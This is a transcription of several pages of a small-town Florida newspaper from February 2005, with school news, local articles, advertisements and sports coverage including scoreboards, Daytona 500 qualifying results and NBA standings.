The classes who received the spirit stick on Friday were: Mrs. Weaver, Miss Smith, Mrs. Domingue, Mrs. Miller, Mrs. Lawrence and Mrs. S. Mrs. Smith's third-grade class wrote pen pal letters to a third-grade class in Dubai, UAE. If you would like to find this city on the map, you will need to look near Saudi Arabia. Mrs. Smith's sister-in-law is a third-grade teacher in this city. They are sending their pictures via e-mail. This is a fun way to use technology in the classroom. Mrs. Wilkinson's fifth-grade class ate their math. Yes, you heard right. They ate their math lesson. They learned how to show equivalent fractions using a Hershey's chocolate bar. The students learned to show how one half equals six-twelfths. Two at a time, the class ate their candy bar, each time using the remainder of the pieces to construct many equivalent fractions. It was a "sweet" lesson and loads of chocolate fun while learning an important lesson. The yearbook has been completed for this school year and sent off for production. Mrs. Wilkinson would like to extend a huge thank you to Mrs. Dempsey and Mrs. Gaylord for their outstanding help. Mrs. Dempsey helped construct some pages along with Mrs. Gaylord. On top of that, Mrs. Gaylord helped by taking several of the pictures and laying many pages out on her home computer. Thanks to these ladies for helping Mrs. Wilkinson meet her deadline. Stay tuned to find out when this Summers tradition will be available for purchase.

Westside Elementary

Mrs. Busch's fifth-grade classroom recently participated in a peace project contest. Her students were able to show off their artistic talents and originality. The work of the class really paid off. The TRTIA Peace Organization recently awarded them a check for $150. Congratulations, class.
Epiphany Catholic

Epiphany's 2005 Think Sharp team members are Savannah Bowdoin, Casey Kemp, Nigel Merrick, JoAnne Ortiz and Jean Saltivan; the alternate is Jacob Foster. Epiphany students participated in many events in celebration of Catholic Schools Week. The students brought in donations to purchase blankets to donate to Catholic Charities. The total amount donated by the students was $200. Students also brought in fruit to create fruit baskets for Willowbrook ALF and for Avalon. Epiphany's Student Council sold Valentine Grams to students. All the proceeds from this project will be donated to Catholic Relief Services to benefit the tsunami victims. The Epiphany Lady Eagles softball team is preparing for another season. The students on the 2005 team are Megan Hill, Arielle Eagle, Chelsey Kahlich, Heather Edenfield, Tiana Wright, Gabby Amparo-Anderson, Holly Crumpton, Julia Stoddard, Taiyuki St. Louis, Gabby Timmerman, JoAnne Ortiz, Jean Saltivan, Holly Saitta, Savannah Bowdoin, Ruth Ruis and Halley Zwanka. The team is led by Coach Dave Ross and Assistant Coach Linda Hill.

Fort White High

Who says reading doesn't pay? Ask the 140 students, ranging from ninth to 12th grade, from Fort White High.

COURTESY PHOTO: Fort White High School students enjoy pizza at the AR Pizza Party. (From left) Zach Egan, Megan Wilson, Matt Case, Ben Anderson, Justin Doris, Rachael Register, Connor Hayden and Ryan Walters.

They were treated to an Accelerated Reader pizza party for their hard work on Feb. 3. The requirements for this party were the completion of all three books, six reading logs and a score of 60 or higher on their AR tests for the third six weeks. The party consisted of 30 pizzas and plenty of soda to go around. It was held in the school's cafeteria and lasted about 45 minutes. This party was made possible by the generous donation from the school's library and the SAC committee.

COURTESY PHOTO: Brian Singleton and Bryan Taylor

Bryan K. Taylor is a 2005 senior at Fort White High. He is 18 years old and has been accepted to the United States Air Force Academy in Colorado Springs, Colorado. He was nominated by Congressman Ander Crenshaw. Bryan will be an officer and go to pilot school. He is one of 1,200 cadets in the class of 2005. Only 15 percent of applicants are offered an appointment to the Academy. There he will major in Aeronautical Engineering and will minor in a foreign language, probably German. Bryan will be leaving on June 28 and will attend basic training over the summer. In August, classes will begin and he will have a very structured day. The government pays for his education. His extracurricular activities include playing soccer, volunteering and Boy Scouts in Troop 85, located in Lake City. Bryan says he owes everything to his parents, Chuck and Debra Roberts and Leslie Taylor, his grandparents, siblings and friends. Thank you all for the support.

Brian Moses Singleton is a 2005 senior at Fort White High School. He is 18 years old and has earned two scholarships, one from Bright Futures and a UF Presidential Scholarship. He has been accepted and plans to attend the University of Florida in the fall of 2005. Brian plans to major in Civil Engineering and will be attending the step-up program over the summer, which is a preparation program for minority engineering students. Brian says when he was young he wanted to be a construction worker, which changed into an architect, which made him interested in engineering. He's also interested in real estate and land development. His extracurricular activities include hanging out with friends, going to the movies, the mall, games, and out to eat. He plans on keeping in touch with all his friends and family. Brian is very excited about starting his career.

CAMPUS CALENDAR

Tuesday: FWHS Indian JV/V Softball at Chiefland, 5/7 p.m.; Indian V Baseball at Union County, 7 p.m.

Wednesday:
CCE: Volunteer Brunch in cafeteria, 8:15 a.m.
Five Points Elementary: Volunteer Appreciation
Melrose Park Elementary: PAWS Reading Dogs Program

Thursday
FWHS: Indian baseball fund-raiser staff breakfast in Hastings' Room, 7:45-9 a.m.; middle school dance in cafeteria, 3:30-6:30 p.m.
Fort White Elementary: Family Reading Night, 4:30-8 p.m.; School Advisory Council (SAC) meeting, 6 p.m.; PTO meeting
Niblack Elementary: Readers Theater; Doughnuts for Dads and Muffins for Moms reading breakfast in media center, 7:30 a.m.
Summers Elementary: Volunteer appreciation reception, 9:30 a.m.; pre-K classes to downtown Lake City for a tour of the fire station, police station, post office and Tucker's Restaurant

Friday
Teacher workday/student holiday
Summers Elementary Chorus will sing at the Olustee Festival.

First Federal Savings Bank of Florida proudly sponsors Newspaper in Education: our community, our kids, our future.

NATION & WORLD

["Copyrighted Material. Syndicated Content. Available from Commercial News Providers."]

DERMATOLOGY
BY ANTHONY AULISIO, M.D.
Board Certified Dermatologist

IT JUST ISN'T FAIR

If you think that the deadliest form of skin cancer, known as melanoma, just poses a threat to fair-skinned people, be advised that it is even deadlier for African-Americans. This may be partly due to the fact that few dark-skinned people expect it. The fact is that nearly two-thirds of melanomas among African-Americans occur in areas of the body that get little sun exposure, including the feet, palms, and toenails. Other areas that may unexpectedly be the site of melanoma are the inside of the mouth and nose. With this in mind, if you see a suspicious lesion on your body, bring it to the immediate attention of a dermatologist. With early intervention, melanoma has a 95% cure rate.
If you would like further information about melanoma, or need to have your skin evaluated for a possible case of cancer, don't hesitate to contact GAINESVILLE DERMATOLOGY & SKIN SURGERY at 332-4442 to schedule an appointment. Our office is conveniently located at 114 N.W. 76th Drive. We are accepting new patients.

P.S. African-Americans should examine their skin, from head to toe, monthly, looking for deep-black spots on the skin and deep-black streaks on nails.

[Auto dealership advertisement: sale prices on a 2005 Lincoln Aviator, '05 Mercury Grand Marquis GS, 2005 Lincoln LS, '05 Mercury Mountaineer, '05 Lincoln Town Car, '05 Ford F-150 and F-150 Supercrew Lariat 4x4, a new Lincoln Navigator and a '55 Mustang coupe; prices plus tax, tag, title and $249.95 fee; remainder illegible.]

LAKE CITY REPORTER, TUESDAY, FEBRUARY 15, 2005

PETS
Continued from page 1A

...favor of pet therapy and cited documented evidence to support its benefits. Hayden said medical studies have shown "people who have pets at home live longer and healthier than people who don't." If patients welcome pet therapy dogs, he said their presence can only be beneficial. "It's got my vote," he said.
"When you look at the evidence, it's hard to argue the facts."

Wisner said by working with North Florida Paws to offer the training, more local dogs with easy-going, kind temperaments can be certified as pet therapy dogs. While the service will be offered at the medical center at least twice a month for now, she said she hopes the frequency will soon increase as more dogs receive training and certification.

Wisner said a miniature schnauzer is also expected to start making pet therapy visits to the medical center by next week.

[Photo, JUSTIN LANG/Lake City Reporter: Certified pet therapy dog Pepi McClead, a Papillon, with Columbia County Senior Services, gets ready to visit another patient at the Lake City Medical Center Monday.]

For patient Linda Sirota of Wellborn, herself a dog owner, it was nice to have Pepi brighten her time at the medical center Monday. "I love animals and I think anybody who is sick, if they have an animal coming in (their room), it just makes them feel better."

MURDER
Continued from page 1A

...detention center in seven months. The time of his murder was later established as Jan. 18 at about 9-10 p.m., just hours after he had been released from jail. According to his arrest report, Razor was homeless and had a South Carolina driver's license. Police have said he left jail with a wallet and received [illegible] from a friend later in the day, but neither have been found.

Few other details have been released so far about Razor or his criminal and personal history. The murder is Lake City's first in three years, the last being the shooting death of John Michael Thomas on Dec. 9, 2001. That case remains unsolved.

ACADEMY
Continued from page 1A

...academy. "At the beginning, it was kind of just an idea," he said. "It's been a dream since about ninth grade. It was like a roller coaster ... there was so much paperwork, but in the end I figured if it was meant to be, I would get in."

Taylor learned he received his appointment on Jan. 28 when the confirmation came from U.S. Rep. Ander Crenshaw's office.

"I was honored to be able to nominate this outstanding young man. I am especially pleased he has received this appointment," stated Crenshaw in a press release. "Bryan has already proven to be an exceptional student, athlete and leader. I am confident he will serve our nation with great dedication and valor."

"That's a telephone call I will never forget," Taylor said. "They called me right before soccer and I played a really good game that night, but I didn't get to score."

While attending the Air Force Academy, Taylor said he plans to major in aeronautical engineering, and after he graduates, he plans to go to pilot flight training. In the meantime, though, he's ready to make a trip to Colorado Springs to visit the Air Force Academy. "Right now I'm just anxious and ready to go," he said. "There is an orientation that I'm going to in April for two days."

Bryan is the son of Chuck and Debra Roberts of Lake City and Leslie Taylor of Lake City.

According to reports, all graduating high school seniors interested in attending a U.S. service academy must go through an extensive nominating process. All applicants are required to complete an application, write an essay, and participate in interviews by a committee of community leaders and retired military officers.

[Culligan water treatment advertisement: "Has your water treatment system been checked lately?" Inspect 'n' Check special, any make or model, limited time offer; call your Culligan Water Specialist toll free at 1-800-233-2063; remainder illegible.]
[Culligan advertisement continued: choose any Culligan water softener or conditioner at a low introductory monthly rate for the first three months; purchase any Culligan water conditioning system and receive a free drinking water system; complete service on everything sold, free salt delivery and free water analysis; call toll free 1-800-233-2063; remainder illegible.]

WAR
Continued from page 1A

...billion was for aid to U.S. allies. Of the total package for the wars, the vast majority, $74.9 billion, was for the Defense Department, with other agencies sharing the rest. Some $12 billion was requested to replace or repair worn-out and damaged equipment, including $3.3 billion for extra armor for trucks and other protective gear [text missing] ... economic development and to help them create democratic institutions.

One possible flashpoint with Congress was two $200 million funds the State Department would control to provide economic and security aid to unspecified U.S. allies.

A total of $950 million would be provided for the tsunami-damaged Indian Ocean countries, largely for relief and long-term reconstruction. Also requested was $242 million for aid for Sudan's war-ravaged Darfur region.
...that seemed to have little to do with the war and should have been in Bush's overall budget released last week.

[Furniture store advertisement: Broyhill "Timeworn" collection in four finishes (Weathered Almond, Scrubbed Olive, Smokey Steel, Brick Ivory); fine furniture, accessories and design for over 30 years, 1052 SW Main Blvd., 752-2752. Italian leather by Soft Line, two styles, six colors: sofas regularly $1,199, now $899; love seats regularly $1,149, now $799; all other leather in stock on sale; all lamps, bedroom, living room, dining room and accessories discounted off ticketed price; no rainchecks, no special orders, in-stock merchandise only; 1429 N. Ohio Ave. (old Food Lion building), Live Oak; remainder illegible.]

WORLD

[Carpet cleaning advertisement: Bayway Carpet & Upholstery, residential and commercial; Lake City 755-6142, Live Oak 362-2244; any three rooms $69 (max. 300 sq. ft. per room; LR/DR combo counts as two; residential only; expires 2-28-05); sofa and chair cleaned, sofa up to 7 ft., some fabrics slightly higher (expires 2-28-05); hall free with three or more rooms cleaned.]

[Auto advertisement: Quality Tire & Brake, complete auto care center, I-75 at Exit 414, Ellisville, 755-9999; free estimates; oil change and filter; tire balance and rotation; free brake inspection.]
[Advertisement: The Orthopaedic [illegible], Edward J. Sambey, M.D.; sports medicine, non-surgical orthopaedics, occupational medicine; workers' compensation and most insurance plans accepted; (386) 755-9215, 1-888-860-7050 toll free; immediate appointments, walk-in patients accepted.]

LAKE CITY REPORTER
Section B, Tuesday, February 15, 2005, Lake City, Florida
Scoreboard 2B | Comics 3B | Classified 4B

FOOTBALL
Fowler agrees to buy Vikings

MINNEAPOLIS - Asked about becoming the league's first black owner, Fowler said Monday, in a seeming contradiction, that he thought it was "a great thing" and not that big a thing. He said race didn't figure in negotiations with McCombs. NFL owners are to meet March 20-23 in Hawaii. League rules require 24 of the 32 owners to approve a sale. The NFL also mandates that a general partner must put down 30 percent of the cash portion of any franchise purchase.

BASEBALL
Canseco's book is a hit

NEW YORK - Jose Canseco's autobiography, accusing several top players of steroid use and charging that baseball long ignored performance-enhancing drugs, appeared to be a hit on its first day in bookstores. Amazon.com listed "Juiced: Wild Times, Rampant 'Roids, Smash Hits, and How Baseball Got Big" as third on its best-seller list Monday. Mark McGwire, one of the former teammates Canseco accused of using steroids, issued a written denial. "The relationship that these allegations portray couldn't be further from the truth," McGwire's statement said. In the book, Canseco is an unabashed advocate of performance-enhancing drugs.

Compiled from Associated Press reports.

Prep schedule

TODAY
* Columbia High softball at Baker County High, 6 p.m. (JV-4)
* Fort White High softball at Chiefland High, 7 p.m. (JV-5)
* Columbia High baseball at Suwannee High, 7 p.m.
* Fort White High boys basketball vs. Bradford High in the District 4-3A tournament at Santa Fe High, 7:30 p.m.

WEDNESDAY
* Columbia High tennis vs. Forest High, 4 p.m.
* LCCC baseball at Polk CC, 5 p.m.
* Columbia High boys basketball vs. Paxon School in the District 6-4A tournament at Fleming Island High, 6 p.m.

THURSDAY
* LCCC baseball vs. North Florida CC, 2:30 p.m.
* Columbia High boys tennis vs. Buchholz High, 3:45 p.m.
* Fort White High softball vs. Union County High, 7 p.m. (JV-5)

FRIDAY
* Columbia High tennis at Baker County High, 3 p.m.
* Columbia High baseball at Madison County High, 4 p.m.
* Fort White High softball at Bradford High, 7 p.m. (JV-5)
* Columbia High softball vs. Fleming Island High, 7 p.m. (JV-5)

SATURDAY
* Columbia High wrestling in Region 1-2A tournament at Crestview High, noon

SUNDAY
* LCCC baseball at Pasco-Hernando CC, 2 p.m.

First step: Columbia is No. 2 seed at district

By TIM KIRBY
tkirby@lakecityreporter.com

Columbia High basketball enters the District 6-4A tournament as the No. 2 seed. While the Tigers lost out on a first-round bye, their half of the bracket may be better.

Columbia (17-8) plays Paxon School at 6 p.m. Wednesday. Other opening-round games are No. 3 Lee High vs. No. 6 Middleburg at 4 p.m. and No. 4 Forrest High vs. No. 5 Fleming Island High at 8 p.m. Fleming Island is hosting the tournament.

Top seed Ridgeview plays the Forrest/Fleming Island winner at 8 p.m. Friday. Columbia's semifinal opponent would be the Lee/Middleburg winner at 6 p.m. The district final is 7:30 p.m. Saturday.

"One of those two (Ridgeview, Forrest) will not make the playoffs, and they are two pretty good teams," CHS head coach Trey Hosford said. "Even though we got the No. 2 seed, I like our draw."

Columbia found out last year being a higher seed does not guarantee success. "Going into the tournament, we've got some guys who have been there and tasted defeat early," Hosford said.
CHS continued on page 2B

[Photo, TIM KIRBY/Lake City Reporter: Columbia High basketball coach Trey Hosford (front) and starters Alvin Bradley, Justin Rayford, Byron Shemwell, Kendric Williams and Antwan Julks (from left) watch the introduction of the opponents at a recent game.]

Indians look to play spoilers

[Photo, MARIO SARMENTO/Lake City Reporter: Fort White High players receive instructions from coach Charles Moore (center).]

By MARIO SARMENTO
msarmento@lakecityreporter.com

The Fort White High boys basketball team is seeded sixth entering tonight's opening game of the District 4-3A tournament, but Charles Moore is expecting a battle. "I feel confident that we can go in and pull off a big upset," Moore said.

The Indians face No. 3 seed Bradford High today at 7:30 p.m. in the second game at Santa Fe High. Fourth-seeded Interlachen High takes on fifth-seeded Keystone Heights High in the first game of the night at 5 p.m. Top seed Santa Fe and No. 2 seed Union County High have byes in the opening round.

Bradford swept both meetings from the Indians this season, 64-46 on Jan. 13 and 87-77 at home on Feb. 1, but Moore thinks the latter meeting may be more indicative of how tonight's game will go. "We didn't play them that tough when we went to their place," Moore said. "But we played them real tough when

HOOPS continued on page 2B

Timberwolves win with Clark juggling lineup

By TIM KIRBY
tkirby@lakecityreporter.com

Lake City Community College's baseball team returned the favor to Darton College, beating the Albany, Ga., school 6-2 on its home field Sunday. Darton knocked off the Timberwolves in Lake City on Saturday.

Lake City jumped out with three runs in the first inning. Stephen Barnes allowed one hit through five innings, but Darton scored two unearned runs in the fourth. Lake City got one run back in the fifth inning and added a pair of insurance runs in the sixth.
The only hit off Barnes was a bloop single in the fifth inning, but he helped shoot himself in the foot in the fourth inning by making two of three consecutive errors by LCCC. A hit batter sent in one run and another scored on a sacrifice fly.

Barnes, who struck out five and walked one in improving to 2-1, left with a blister in the sixth inning. Raleigh Evans relieved with a 2-0 count and struck out the batter. He went four innings with two hits, two walks and five strikeouts to get the save.

"Raleigh was scheduled to start on Wednesday, but I thought we needed a win," LCCC head coach Tom Clark said.

Lake City's first-inning rally came with two outs. Chris Petrie doubled, and Brandon Hall scored him with a single. Mark Davis singled and Augustin Montanez drove in both runs with a double. In the fifth inning, Petrie singled and was forced by Davis. Walks to Montanez, Stephen Rassel and Travis Jones produced the run. In the sixth inning, both Matt Dallas and Petrie singled and stole second. Hall brought them home with a double.

Dallas, who was moved to the leadoff spot, had two hits. Petrie had three hits, including two off lefties. Luis Sanchez also singled for the 'Wolves.

"We had no hits in the last three innings and that is a minus for us with the way the bullpen's pitching," Clark said. "On Saturday, we did not score any runs from the seventh to the 10th inning."

Catcher Hall has been injured and relegated to DH. That has moved Davis to first, Rassel to left field (the third position he has played this season), Jones to center field and Avery Johnson, who has been struggling at the plate, out of the lineup.

"Petrie, Hall, Davis and Dallas are coming on pretty strong and Montanez is starting to hit," Clark said. "Our other catchers are doing a good job defensively, but they do not have a hit. I like to hit up and down the lineup and we are not doing that right now."

The 'Wolves play at Polk Community College at 5 p.m. Wednesday.
Brian Schlitter will start, if he is recovered from being hit by a line drive on Friday. North Florida Community College visits Thursday for a 2:30 p.m. game and will face Duente Heath. Barnes will return to the mound Sunday for a 2 p.m. road game at Pasco-Hernando Community College.

Lady Timberwolves softball

Lake City Community College's softball team won one of three games at the Triple Crown Classic in St. Augustine over the weekend. Lake City fell to Hillsborough 4-1, despite a two-hitter thrown by Jenna

LCCC continued on page 2B

SCOREBOARD

TELEVISION
TV sports today

MEN'S COLLEGE BASKETBALL
7 p.m. ESPN: Indiana at Ohio St.; ESPN2: Connecticut at Providence
9 p.m. ESPN: Kentucky at South Carolina

NBA
8 p.m. NBA TV: New Jersey at Minnesota

SOCCER
2:5[?] p.m. ESPN2: Exhibition, FIFA/UEFA Football for Hope, Shevchenko XI vs. Ronaldinho XI, at Barcelona, Spain

FOOTBALL
Pro Bowl
At Honolulu

NFC 0 10 14 3 - 27
AFC 14 14 0 10 - 38

First Quarter
AFC - Harrison 62 pass from Manning (Vinatieri kick), 8:33.
AFC - Ward 41 pass from Manning (Vinatieri kick), 2:49.

Second Quarter
NFC - Westbrook 12 run (Akers kick), 12:09.
AFC - Ward 39 kick return (Vinatieri kick), 12:01.
AFC - Gates 12 pass from Manning (Vinatieri kick), 5:50.
NFC - FG Akers 33, 1:41.

Third Quarter
NFC - Holt 27 pass from Vick (Akers kick). [Remainder of scoring summary illegible.]
A-59,225.

Team statistics (NFC / AFC):
First downs 26 / 15
Total net yards 492 / 343
Rushes-yards 27-155 / 27-120
Passing 337 / 223
Punt returns 0-0 / 1-7
Kickoff returns 5-136 / 6-165
Interceptions ret. 1-0 / 3-5
Comp-att-int 24-48-3 / 12-22-1
Sacked-yards lost 2-16 / 2-13
Punts 1-59.0 / 2-42.5
Fumbles-lost 1-0 / 1-1
Penalties-yards 3-28 / 2-10
Time of possession 35:34 / 24:26

[Individual passing statistics largely illegible; legible figures include Manning 6-10-0-130.]

AUTO RACING
Daytona 500 qualifying
Sunday, at Daytona International Speedway, Daytona Beach
(Car number in parentheses)

1. (88) Dale Jarrett, Ford, 188.312 mph.
2. (48) Jimmie Johnson, Chevrolet, 188.170.
3.
(24) Jeff Gordon, Chevrolet, 188.155.
4. (29) Kevin Harvick, Chevrolet, 187.915.
5. (01) Joe Nemechek, Chevrolet, 187.837.
6. (10) Scott Riggs, Chevrolet, 187.758.
7. (11) Jason Leffler, Chevrolet, 187.715.
8. (97) Kurt Busch, Ford, 187.699.
9. (21) Ricky Rudd, Ford, 187.414.
10. (38) Elliott Sadler, Ford, 187.398.
11. (36) Boris Said, Chevrolet, 187.122.
12. (45) Kyle Petty, Dodge, 186.974.
13. (23) Mike Skinner, Dodge, 186.753.
14. (16) Greg Biffle, Ford, 186.587.
15. (9) Kasey Kahne, Dodge, 186.501.
16. (5) Kyle Busch, Chevrolet, 186.486.
17. (42) Jamie McMurray, Dodge, 186.397.
18. (14) John Andretti, Ford, 186.324.
19. (31) Jeff Burton, Chevrolet, 186.270.
20. (0) Mike Bliss, Chevrolet, 186.262.
21. (2) Rusty Wallace, Dodge, 186.150.
22. (19) Jeremy Mayfield, Dodge, 186.143.
23. (6) Mark Martin, Ford, 186.123.
24. (18) Bobby Labonte, Chevrolet, 186.112.
25. (99) Carl Edwards, Ford, 186.047.
26. (4) Mike Wallace, Chevrolet, 185.908.
27. (22) Scott Wimmer, Dodge, 185.793.
28. (20) Tony Stewart, Chevrolet, 185.701.
29. (12) Ryan Newman, Dodge, 185.659.
30. (07) Dave Blaney, Chevrolet, 185.636.
31. (1) Martin Truex Jr., Chevrolet, 185.575.
32. (33) Kerry Earnhardt, Chevrolet, 185.502.
33. (15) Michael Waltrip, Chevrolet, 185.448.
34. (40) Sterling Marlin, Dodge, 185.445.
35. (41) Casey Mears, Dodge, 185.300.
36. (25) Brian Vickers, Chevrolet, 185.239.
37. (49) Ken Schrader, Dodge, 185.109.
38. (7) Robby Gordon, Chevrolet, 184.911.
39. (8) Dale Earnhardt Jr., Chevrolet, 184.888.
40. (00) Kenny Wallace, Chevrolet, 184.703.
41. (27) Kirk Shelmerdine, Ford, 184.665.
42. (09) Johnny Sauter, Dodge, 184.528.
43. (37) Kevin Lepage, Dodge, 184.400.
44. (66) Hermie Sadler, Ford, 184.211.
45. (73) Eric McClure, Chevrolet, 183.963.
46. (17) Matt Kenseth, Ford, 183.494.
47. (77) Travis Kvapil, Dodge, 183.415.
48. (92) Stanton Barrett, Chevrolet, 183.098.
49. (13) Greg Sacks, Dodge, 183.024.
50. (32) Bobby Hamilton Jr., Chevrolet, 182.990.
51.
(89) Morgan Shepherd, Dodge, 182.789.
52. (55) Derrike Cope, Chevrolet, 182.275.
53. (34) Randy LaJoie, Chevrolet, 181.159.
54. (52) Larry Gunselman, Ford, 178.409.
55. (93) Geoffrey Bodine, Chevrolet, 177.085.
56. (80) Andy Belmont, Ford, 174.683.
57. (43) Jeff Green, Dodge, did not finish.

BASKETBALL
NBA standings

EASTERN CONFERENCE
Atlantic Division: W L Pct GB
Boston 26 26 .500 -
Philadelphia 26 26 .500 -
New Jersey 22 29 .431 3 1/2
Toronto 21 31 .404 5
New York 20 32 .385 6

Southeast Division: W L Pct GB
Miami 39 14 .736 -
Washington 30 20 .600 7 1/2
Orlando 27 24 .529 11
Charlotte 10 39 .204 27
Atlanta 10 39 .204 27

Central Division: W L Pct GB
Detroit 30 19 .612 -
Cleveland 29 20 .592 1
Chicago 24 23 .511 5
Indiana 24 26 .480 6 1/2
Milwaukee 20 28 .417 9 1/2

WESTERN CONFERENCE
Southwest Division: W L Pct GB
San Antonio 40 12 .769 -
Dallas 33 16 .673 5 1/2
Houston 31 21 .596 9
Memphis 30 22 .577 10
New Orleans 10 41 .196 29 1/2

Northwest Division: W L Pct GB
Seattle 35 14 .714 -
Minnesota 25 27 .481 11 1/2
Denver 23 28 .451 13
Portland 21 29 .420 14 1/2
Utah 17 33 .340 18 1/2

Pacific Division: W L Pct GB
Phoenix 40 12 .769 -
Sacramento 33 18 .647 6 1/2
L.A. Lakers 25 24 .510 13 1/2
L.A. Clippers 23 28 .451 16 1/2
Golden State 14 37 .275 25 1/2

Sunday's Games
Miami 96, San Antonio 92
Chicago 87, Minnesota 83
Cleveland 103, L.A. Lakers 89
Sacramento 104, Boston 100
Indiana 76, Memphis 73
Toronto 109, L.A. Clippers 106
New York 102, Charlotte 99
Orlando 97, New Orleans 94
New Jersey 94, Denver 79
Dallas 95, Seattle 92
Houston 81, Portland 80
Phoenix 106, Golden State 102, OT

Monday's Games (Late Games Not Included)
Philadelphia 106, New York 105
Portland 80, Charlotte 77
Milwaukee at Detroit (n)
Washington at New Orleans (n)
Utah at Phoenix (n)

Today's Games
L.A. Clippers at Orlando, 7 p.m.
Denver at Atlanta, 7:30 p.m.
New Jersey at Minnesota, 8 p.m.
Sacramento at Chicago, 8:30 p.m.
Washington at Houston, 8:30 p.m.
Utah at L.A. Lakers, 10:30 p.m.
Dallas at Golden State, 10:30 p.m.
LCCC
Continued from page 1B

...Kopperson. The Lady Timberwolves bounced back to beat Mid-Florida Conference foe St. Johns River Community College 7-5. Kalie Ellis was the winning pitcher. Andrea Gonzalez and Lauren Beidiger were both 2-for-3.

Lake City lost to eventual tournament champion Georgia 9-8. Kristin Oldham started and Kopperson took the loss in relief. Ellis also pitched. Gonzalez had a three-run double and Beidiger was 3-for-4.

"The team is starting to play much better," coach B.J. Hodges said.

HOOPS
Continued from page 1B

...they were down here. The game wasn't decided until the last two minutes. And we missed free throws at the end, and they made their free throws."

In the last meeting, the Tornadoes' Paris Ruise scored 49 points on 20-31 from the field. For the Indians to win, they will have to play solid defense and limit their turnovers, which has been the bane of their season.

"We still haven't really clicked as a team on defense," Moore said. "We score points, but if we can just get the defense to click, who knows how far we can go?"

On offense, the Indians rely on Antwan Ruise and Joey Pinello, their top two scoring threats this season. "Antwan came on late because of eligibility, but he and Joey have really clicked together as a unit," Moore said. "And the other guys seem to be working together also. Offensively, we seem to be playing team ball. We're sharing the ball."

Owen McFadden will also be a key player as the main distributor and primary ballhandler on the team. Pinello was the Indians' leading rebounder during the season, and at 6-foot-2, he is the tallest player on the roster.

Moore has also gotten solid contributions from his role players. "Matt Acosta and Jeremy Harrell gave us a lift coming off the bench this season," Moore said. He also cited junior varsity call-ups Robert Jammer and Justin Pinello for giving the team "a lot of positive minutes."

The Indians were 8-16 (1-9 in District 4-3A) during the regular season.
CHS
Continued from page 1B

"Hopefully, we will go into it knowing it is a new season and we won't look past anyone. Paxon can play loose and free. They have nothing to lose. The pressure is on us. We have to play with confidence, and we should be OK."

It took overtime for Columbia to beat Paxon, 72-69, in Lake City in mid-January. The Tigers won 52-45 in Jacksonville two weeks later, and had control of the game for all of the fourth quarter.

"In the first one, we played man pretty much the entire game," Hosford said. "We pressed a lot and they got a lot of easy baskets. They shot 65 percent (32 for 49). The second game, we went zone from the second possession and they shot 13 for 36. We will probably show a lot of zone Wednesday."

Zone is about all Columbia sees from district opponents, and Hosford expects Paxon to pack it in. "The thing about going against a zone is you can't settle for 3-pointers," Hosford said. "Most teams playing a zone want you to take that early 3. I would much rather take the ball inside and get an inside-out passing game going. You not only want to go inside, but to the high post. That is the most dangerous spot against a zone."

Hosford said Columbia center Antwan Julks has stepped up his play and is good at finding an open shooter. For the last six games, Julks has averaged 10.5 points per game and 8.2 rebounds.

"I feel like our guards can go head to head with anybody in the district and, with a scoring presence inside, it causes teams problems guarding up," Hosford said. "We have also out-rebounded six of our last seven opponents."

Hosford said guard Kenneth Williams is also playing well. At the team's Free Throw Shoot-around fund-raiser, Williams made 477 of 500 (95 percent), including his last 100 in a row. "Kenny doesn't make a lot of mistakes on offense or defense," Hosford said. "In his last seven games, he is averaging over 10 points and has two turnovers, and that is playing 20-25 minutes per game."

Among the starters, Kendric Williams leads the Tigers at 13.6 points per game and he is averaging 4.2 rebounds. Alvin Bradley is averaging 10.7/6.2; Byron Shemwell's numbers are 8.1/3.3; Justin Rayford's averages are 5.4/3.5. Overall, Julks is 5.8/5.5.

Croft places fourth in state weightlifting finals

From staff reports

Columbia High's Marie Croft earned team points in the Florida High School Athletic Association Girls Weightlifting Finals at DeLand High on Saturday. Croft placed fourth in the 101-pound weight class with a 105 bench press, 120 clean and jerk, and a 225 total. Jenna Payne, who qualified in the 110-pound weight class, finished in a tie for 10th. Payne lifted 100-130-230.

Spruce Creek High crushed the competition, scoring 47 team points. Oviedo High and Lakewood Ranch High tied for second with 13 points.

"They both had a rough start, only getting their first attempt on the bench press," coach Kent Maugeri said. "I'm not sure if they were too nervous due to the fact it was their first time lifting at a state championship. They didn't let the bench press affect them for the clean and jerk. They both did well and I am very proud of them."

POLLS
AP Top 25

The top 25 teams in The Associated Press men's college basketball poll, with first-place votes in parentheses, records through Feb. 13, total points and last week's ranking:

(Record, Pts, Pvs)
1. Illinois (72) 25-0 1,800 1
2. Kansas 20-1 1,710 3
3. Kentucky 19-2 1,592 5
4. North Carolina 20-3 1,576 2
5. Wake Forest 21-3 1,553 6
6. Boston College 20-1 1,365 4
7. Duke 18-3 1,348 7
8. Oklahoma St. 19-3 1,329 10
9. Syracuse 22-3 1,219 8
10. Arizona 21-4 1,140 12
11. Michigan St. 17-4 1,008 13
12. Louisville 21-4 965 9
13. Gonzaga 19-4 889 14
14. Utah 21-3 827 15
15. Washington 20-4 811 11
16. Alabama 19-4 737 17
17. Pittsburgh 17-4 717 18
18. Connecticut 15-6 602 19
19. Pacific 20-2 360 24
20.
Wisconsin 16-6 342 20
21. Oklahoma 17-6 263 16
22. Maryland 15-7 231 -
23. Charlotte 17-4 225 -
24. Cincinnati 18-6 130 21
25. Villanova 14-6 118 22

Others receiving votes: Florida 105, Georgetown 48, Texas 46, Texas Tech 46, DePaul 45, Old Dominion 44, Mississippi St. 33, Nevada 29, Notre Dame 28, Georgia Tech 27, S. Illinois 21, Wichita St. 21, Vermont 19, Memphis 7, Wis.-Milwaukee 7, Miami 6, George Washington 5, St. Mary's, Cal. 2, Texas A&M 2, Holy Cross 1, Minnesota 1.

Top 25 schedule

Today's Games
No. 3 Kentucky at South Carolina, 9 p.m.
No. 5 Wake Forest at Miami, 7 p.m.
No. 18 Connecticut at Providence, 7 p.m.
No. 25 Villanova vs. Bucknell, 7:30 p.m.

Wednesday's Games
No. 1 Illinois at Penn State, 8 p.m.
No. 4 North Carolina vs. Virginia, 7 p.m.
No. 6 Boston College vs. Rutgers, 7:30 p.m.
No. 11 Michigan State vs. Minnesota, 7 p.m.
No. 16 Alabama vs. Arkansas, 8 p.m.
No. 19 Pacific vs. UC Santa Barbara, 10 p.m.
No. 20 Wisconsin vs. Michigan, 9 p.m.
No. 21 Oklahoma vs. Nebraska, 8 p.m.
No. 22 Maryland at NC State, 9 p.m.
No. 23 Charlotte vs. DePaul, [time illegible]

[Day header illegible]
No. 18 Connecticut at Rutgers, 6 p.m.
No. 19 Pacific vs. Texas-El Paso, Mid.
